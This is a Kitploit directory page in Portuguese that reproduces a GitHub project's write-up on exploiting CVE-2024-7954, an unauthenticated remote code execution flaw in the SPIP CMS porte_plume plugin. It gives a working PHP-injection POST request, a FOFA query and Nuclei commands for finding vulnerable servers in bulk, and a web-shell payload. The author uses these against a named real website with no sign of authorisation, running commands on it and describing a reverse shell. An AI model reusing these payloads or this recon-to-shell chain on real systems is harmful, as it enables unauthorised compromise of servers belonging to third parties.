Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
Exploitation-of-a-Remote-Code-Execution-vulnerability--CVE-2024-7954- — Exploitation of a Remote Code Execution vulnerability- (CVE-2024-7954) | Kitploit
Ferramentas/GitHubGitHub/shivanshkuntal/exploitation-of-a-remote-code-execution-vulnerability--cve-2024-7954-
ReconnaissanceWeb Vulnerability ScannersVulnerability AnalysisExploitationWeb Application ExploitationInformation GatheringPenetration TestingLearning & EducationRed Teaming

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Payload Development
Labs & Practice
GitHubshivanshkuntal/exploitation-of-a-remote-code-execution-vulnerability--cve-2024-7954-

Exploitation-of-a-Remote-Code-Execution-vulnerability--CVE-2024-7954-

Exploitation of a Remote Code Execution vulnerability- (CVE-2024-7954)

Ver Repositório
1há 8 mesesAinda não revisado
Compartilhar

Exploração da Vulnerabilidade de Execução Remota de Código (CVE-2024-7954)

Projeto de Teste de Vulnerabilidade de Software Enviado por: Shivansh Kuntal


Visão Geral

Este projeto demonstra a exploração da CVE-2024-7954, uma vulnerabilidade crítica de Execução Remota de Código (RCE) que afeta o SPIP CMS através do seu plugin porte_plume. A vulnerabilidade permite que atacantes não autenticados executem código PHP arbitrário no servidor alvo por meio de requisições HTTP POST manipuladas.

Os testes foram realizados em um ambiente local controlado e posteriormente estendidos para reconhecimento em cenário real usando FOFA e Nuclei.


1. Configuração do Ambiente

Uma versão vulnerável do SPIP CMS, confirmada como afetada pela CVE-2024-7954, foi implantada localmente em um servidor Apache usando um repositório GitHub que hospeda versões conhecidamente vulneráveis.

Ferramentas Utilizadas

  • Burp Suite (interceptação e modificação de requisições HTTP)
  • Apache Web Server
  • FOFA Search Engine
  • Nuclei Vulnerability Scanner
  • curl (exploração via CLI)

A página inicial do SPIP rodando em localhost validou a instalação bem-sucedida e serviu como alvo para exploração.


2. Descrição da Vulnerabilidade

O plugin porte_plume (antes das versões 4.30-alpha2, 4.2.13, 4.1.16) é vulnerável devido à sanitização insuficiente da entrada fornecida pelo usuário. Atacantes podem injetar código PHP em campos de formulário específicos que posteriormente é renderizado e executado pelo servidor.

Impacto: Execução Remota de Código Não Autenticada Severidade: Crítica Vetor de Ataque: Rede / HTTP POST


3. Prova de Conceito (PoC)

Requisição POST Maliciosa

root@kitploit:~
POST /index.php?action=porte_plume_previsu HTTP/1.1
Host: {{hostname}}
Content-Type: application/x-www-form-urlencoded

data=AA_[<img111111>->URL`<?php system('cat /etc/passwd'); ?>`]_BB

Notas

  • O código PHP é injetado dentro do mecanismo de formatação markdown.
  • Executado como o usuário SPIP no servidor.
  • O ataque não requer autenticação.

4. Reconhecimento com FOFA

Uma consulta FOFA foi usada para enumerar instalações públicas de SPIP:

root@kitploit:~
app="SPIP"

O FOFA retornou vários pontos de metadados:

  • Cabeçalhos HTTP
  • Títulos
  • Endereços IP e geolocalização
  • Stack tecnológica do servidor

Valor do Reconhecimento

  1. Enumeração de Alvos: Identificar servidores SPIP CMS acessíveis.
  2. Identificação de Versão: Determinar se versões vulneráveis do plugin estão ativas.
  3. Priorização: Selecionar sistemas provavelmente exploráveis.
  4. Verificação de Exploração: Validar endpoints usando payloads controlados.
  5. Automação: Exportar resultados FOFA para targets.txt para varredura em lote.

Um host real adequado identificado:

root@kitploit:~
http://www.comite-tricolore.org/

5. Varredura Automatizada com Nuclei

Propósito

Como a exploração manual é lenta, o Nuclei foi usado para automatizar a detecção da CVE-2024-7954 em um grande conjunto de alvos.

Comando (Template Personalizado)

root@kitploit:~
nuclei -l targets.txt -t CVE-2024-7954.yaml
  • -l targets.txt carrega os resultados FOFA
  • -t carrega o template PoC personalizado

Nota: O template inicial retornou nenhuma correspondência.

Varredura Ampla de CVEs

root@kitploit:~
nuclei -l targets.txt -t cves/

Esta varredura identificou um alvo responsivo:

root@kitploit:~
http://www.comite-tricolore.org/

6. Validação e Exploração Manual

Passo 1 — Inspecionar o Endpoint Vulnerável

Acessar:

root@kitploit:~
http://www.comite-tricolore.org/spip.php?page=contact

Confirmado:

  • Campos de entrada para nome, email, mensagem
  • Manipulador de requisição POST adequado para injeção de payload

Passo 2 — Injetar Payload PHP

Usando Burp Suite ou curl, modificar o parâmetro message:

Payload

root@kitploit:~
<?php system($_GET['cmd']); ?>

Passo 3 — Disparar a Execução de Comandos

Acessar:

root@kitploit:~
http://www.comite-tricolore.org/spip.php?page=contact&cmd=id

Ou usando curl:

root@kitploit:~
curl "http://www.comite-tricolore.org/spip.php?page=contact&cmd=id"

Saída confirmou execução remota de comandos.

Passo 4 — Reverse Shell (Acesso Final)

Um payload elaborado possibilita um callback de reverse shell, permitindo:

  • whoami
  • ls
  • acesso interativo completo ao shell

7. Observações Críticas

  • Exploração não autenticada aumenta drasticamente a severidade.
  • Falha na sanitização de entrada no plugin é o problema central.
  • Uma vez que o PHP é injetado e renderizado, o comprometimento completo do servidor é possível.
  • Reverse shell → potencial escalonamento de privilégios → tomada do servidor.
  • O ataque é trivial de automatizar com curl, scripts Python ou Nuclei.

8. Conclusão

Este projeto demonstra a cadeia completa de exploração para a CVE-2024-7954, desde o reconhecimento até a obtenção de um shell interativo.

Caminho de Exploração

  1. Reconhecimento (FOFA)
  2. Varredura Automatizada (Nuclei)
  3. Injeção Manual de Payload
  4. Execução de Código Verificada
  5. Acesso Reverse Shell

Lições de Segurança

  • Validação rigorosa de entrada é obrigatória para todos os dados controlados pelo usuário.
  • Plugins devem seguir práticas de codificação segura.
  • Organizações devem aplicar patches de segurança prontamente.
  • Avaliações regulares de vulnerabilidade são essenciais para prevenir ataques RCE.

Esta vulnerabilidade destaca como um plugin de formatação de texto aparentemente inofensivo pode criar um comprometimento completo do sistema quando não está devidamente protegido.

Baixar ferramenta